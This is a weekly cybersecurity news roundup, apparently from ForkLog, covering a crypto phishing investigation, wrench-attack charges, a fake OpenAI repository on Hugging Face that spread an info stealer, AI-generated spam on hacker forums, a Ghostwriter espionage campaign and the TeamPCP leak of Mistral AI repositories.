We’ve gathered the most important cybersecurity news from the past week.

  • ZachXBT identified the mastermind behind $19 million phishing attacks.
  • Three suspects were charged in a series of "wrench attacks" in California.
  • A fake OpenAI repository was spreading an info stealer.
  • "AI junk" has flooded platforms for hackers and cybercriminals.

ZachXBT Identifies Mastermind Behind $19 Million Phishing Attacks

On-chain researcher ZachXBT revealed details of an investigation into cryptocurrency theft via phishing, totaling over $19 million.

1/ Meet Dritan Kapllani Jr, a US-based threat actor tied to $19M from social engineering thefts targeting crypto holders.

Dritan flexes luxury cars, watches, private jets, & clubs all over social media.

Recently he was recorded on a call showing off a wallet with stolen funds. pic.twitter.com/iDKyUjUm4M

— ZachXBT (@zachxbt) May 12, 2026

The main suspect is American hacker Dritan Kapllani Jr. His de-anonymization began with his own carelessness.

On April 23, 2026, during a Discord video call, Kapllani argued with a user about capital sizes (band 4 band). As proof, he showed his Exodus crypto wallet screen with a balance of $3.68 million.

ZachXBT analyzed the transaction chain of the Ethereum address. It was found that the funds were linked to the theft of 185 BTC that occurred on March 14, 2026. The investigation revealed that on March 15, Kapllani received his share—$5.3 million. By the time of the video call in April, the hacker had already spent or laundered about $1.6 million.

During the investigation, the detective also uncovered Kapllani's connection to earlier incidents. This was aided by cybercriminal John Dagita, previously arrested for stealing over $40 million from the US government. As revenge for past conflicts, he published one of Kapllani's old addresses on Telegram.

ZachXBT confirmed his ownership: the withdrawal algorithm matched exactly what was used in the theft of 185 BTC. It was also discovered that in the fall of 2025, over $5.85 million passed through this wallet, stolen in five phishing attacks.

The expert assisted one of the affected parties in the investigation but intentionally withheld his findings until official actions were taken by authorities.

On May 11, 2026, court documents related to the theft of 185 BTC were unsealed.

Charges have already been filed against:

  • Trenton Johnson—for direct involvement in the theft, facing up to 40 years in prison;
  • crypto influencer known as yelotree—for aiding in laundering funds through a car rental business in Miami (up to 30 years in prison).

Kapllani leads a public and lavish lifestyle, showcasing private jets and luxury cars on social media. He had managed to evade arrest for a long time—detectives attribute this "invulnerability" to the common practice of delaying prosecution for minors. Since Kapllani recently turned 18, ZachXBT suggests that charges will be filed against him soon.

Three Suspects Charged in Series of "Wrench Attacks" in California

The US Attorney's Office charged Elijah Armstrong, Nino Chindawan, and Jayden Raker with robbery, kidnapping, and conspiracy related to a series of cryptocurrency thefts.

According to court documents, the suspects moved from Tennessee to California. To gain entry into victims' homes, they posed as couriers.

In November 2025, in San Francisco, a "courier" with a box attacked a client at the entrance to an apartment. The victim was bound with tape, beaten with a gun's handle, and threatened to transfer $10 million in Bitcoin and $3 million in Ethereum.

In another "wrench attack" incident, the victim lost $6.5 million in cryptocurrency.

Armstrong and Raker were arrested in Los Angeles on December 31, 2025, while Chindawan was apprehended in Sunnyvale on December 22, 2025. They face:

  • up to 20 years in prison for robbery and attempted kidnapping;
  • life imprisonment for conspiracy to commit kidnapping;
  • fines of $250,000 for each charge.

According to CertiK, there were 72 recorded "wrench attacks" worldwide in 2025, a 75% increase from the previous year. The total losses from such crimes reached a record $41 million.

Fake OpenAI Repository Spread Info Stealer

A malicious repository on Hugging Face mimicked OpenAI's Privacy Filter project to deliver an info stealer. This was reported by researchers from HiddenLayer.

The Hugging Face platform allows developers and researchers to share AI models, datasets, and machine learning tools.

Experts noted that scammers used a similar name in the Open-OSS/privacy-filter repository, which contained a loader.py file that executes malware to steal data on Windows OS.

The Python script included fake AI-related code to appear harmless. However, in the background, it disabled SSL key verification, decoded a URL pointing to an external resource, and then extracted and executed a PowerShell command.

The code, executed in an invisible window, loaded a start.bat batch file. It escalated privileges in the system and downloaded the final payload, adding it to Microsoft Defender's exceptions. This payload was an info stealer written in Rust, capable of taking screenshots. The program stole:

  • cookies, saved passwords, encryption keys, browsing history from Chromium and Gecko-based browsers;
  • Discord tokens, local databases, and master keys;
  • crypto wallets and their browser versions;
  • credentials and configuration files for SSH, FTP, and VPN, including FileZilla;
  • system information.

Researchers noted that the overwhelming majority of the 667 accounts that liked the malicious repository appeared to be automatically generated. Additionally, the download count of 244,000 may have been artificially inflated.

“AI Junk” Floods Platforms for Hackers and Cybercriminals

Complaints about "AI junk" increasingly appear on the dark web, infiltrating discussions, guides, and technical posts. This was reported by Wired, citing research from Cambridge University and the University of Strathclyde.

Experts analyzed around 98,000 threads on hacker forums related to AI from the launch of ChatGPT in 2022 until the end of 2025. During this period, attitudes toward generative models in the cybercriminal environment changed significantly.

According to the study, while hackers previously discussed how neural networks could help write malicious code or find vulnerabilities, they now more frequently complain about the influx of "AI slop": useless posts and primitive guides on basic topics.

Moreover, some forum participants are unhappy that LLM responses in Google search results reduce traffic to their sites, negatively impacting the marketing of hacker platforms.

However, researchers did not observe a significant impact of AI on the activities of inexperienced scammers. It has not yet lowered the entry barrier for newcomers or led to drastic changes in the cybersecurity industry.

Belarus-Linked Hacker Group Attacks Ukrainian Government Agencies

In March 2026, a new campaign by the Ghostwriter hacker group (also known as UNC1151 and FrostyNeighbor) targeting Ukrainian government and defense structures was recorded. This was reported by researchers from ESET.

The Ghostwriter group, specializing in cyber espionage in Eastern Europe, is linked to Belarus.

Experts noted that the attackers sent phishing PDF files mimicking documents from the company "Ukrtelecom." Malicious links in the document led to the download of PicassoLoader software, which then deployed the popular Cobalt Strike attack tool.

The hackers used IP address verification—the infected archive was only downloaded if the victim was located in Ukraine.

Researchers noted the group’s high "operational maturity." PicassoLoader can send a "fingerprint" of the system to the hackers' servers every 10 minutes. Based on this data, Ghostwriter operators decide whether to continue the attack on a specific target.

Unlike campaigns in Poland or Lithuania, where the group targets a wide range of sectors from logistics to healthcare, its activities in Ukraine are focused exclusively on the military and government sectors.

TeamPCP Hackers Threaten to Release Mistral AI Repositories

The TeamPCP hacker group threatened to leak the source code of Mistral AI projects if a buyer for the stolen data is not found. This was reported by BleepingComputer.

Mistral AI is a French artificial intelligence company founded by former Google DeepMind and Meta researchers. It specializes in developing LLMs with open weights and proprietary software.

In their post on a hacker forum, the attackers demanded $25,000 for a package containing nearly 450 repositories.

In an official statement to BleepingComputer, Mistral AI confirmed the compromise of its code management system. The breach resulted from a large-scale software supply chain attack called Mini Shai-Hulud.

Mistral AI claims that the affected data is not part of the core source code.

According to published information, the attack unfolded in several stages. Initially, the attackers gained access to official TanStack and Mistral AI packages using stolen CI/CD credentials. Subsequently, the malicious campaign spread to hundreds of projects in npm and PyPI registries, including developments from UiPath, Guardrails AI, and OpenSearch.

Mistral AI acknowledged that the attackers briefly injected malicious code into some of the company’s SDK packages.

The TeamPCP group claims to have downloaded nearly 5 GB of internal data that Mistral uses for training, fine-tuning, benchmarking, and experimentation.

The hackers stated they would release the information publicly if a buyer is not found within a week.

Also on ForkLog:

  • Criminals withdrew $10 million from THORChain.
  • The alliance of Tether, TRON, and TRM Labs froze crypto assets worth $450 million.
  • The Ethereum Foundation launched a service to protect against blind signing of transactions.
  • CertiK reported on the "industrialization" of crypto thefts by North Korea.
  • The Roaring Kitty account was hacked for a token dump of RKC.
  • Google noted an increase in AI popularity among cybercriminals.
  • LayerZero acknowledged errors after the Kelp hack of $292 million.

What to Read This Weekend?

In a new article, ForkLog explores how the main software contractor for the US Department of Defense and intelligence agencies, Palantir Technologies, "ensures the obvious superiority of the West."